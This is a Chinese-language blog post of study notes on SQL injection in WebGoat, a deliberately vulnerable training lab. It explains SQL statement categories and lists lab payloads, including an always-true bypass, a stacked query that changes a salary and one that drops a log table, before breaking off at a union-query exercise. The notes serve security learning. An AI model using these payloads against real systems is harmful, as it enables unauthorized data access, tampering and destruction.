WebGoat笔记之三：Injection

Wed, 20 Nov 2024 00:00:00 +0000

SQL Injection (intro) #

SQL 是下面三个概念的实现：

Data Manipulation Language, DML
Data Definition Lanaguage, DDL
Data Control Language, DCL

DML 是最主要的部分，即增删改查

SQL 的实现为 INSERT, DELETE, UPDATE, SELECT

INSERT/UPDATE 体现完整性 (Integrity)

SELECT 体现机密性 (Confidentiality)

UPDATE/DELETE 体现可用性 (Availability)

UPDATE employees SET department='Sales' WHERE first_name = 'Tobi';

DDL 定义数据格式和数据库的结构 (schema)

SQL 的实现为 CREATE (TABLE), DROP (TABLE), ALTER (TABLE)

ALTER TABLE employees ADD COLUMN phone varchar(20);

DCL 负责实现用户访问控制的功能

SQL 的实现为 GRANT, REVOKE

GRANT ALL ON grant_rights TO unauthorized_user;

实验使用的几个 payload

123' or 1=1--aa
123';UPDATE employees SET salary=100000 WHERE userid=37648--aa
123';DROP TABLE access_log--aa

SQL Injection (advanced) #

实验一：联表查询 #

CREATE TABLE user_data (userid int not null,
                        first_name varchar(20),
                        last_name varchar(20),
                        cc_number varchar(30),
                        cc_type varchar(10),
                        cookie varchar(20),
                        login_count int);

CREATE TABLE user_system_data (userid int not null primary key,
			                   user_name varchar(12),
			                   password varchar(10),
			                   cookie varchar(30));

实验提供了一个以 last_name 查询表一的接口，需要通过该接口的 SQL 注入漏洞查询到表二

SQLi on PseudorandomDog's Blog

WebGoat笔记之三：Injection

SQL Injection (intro) #

SQL Injection (advanced) #

实验一：联表查询 #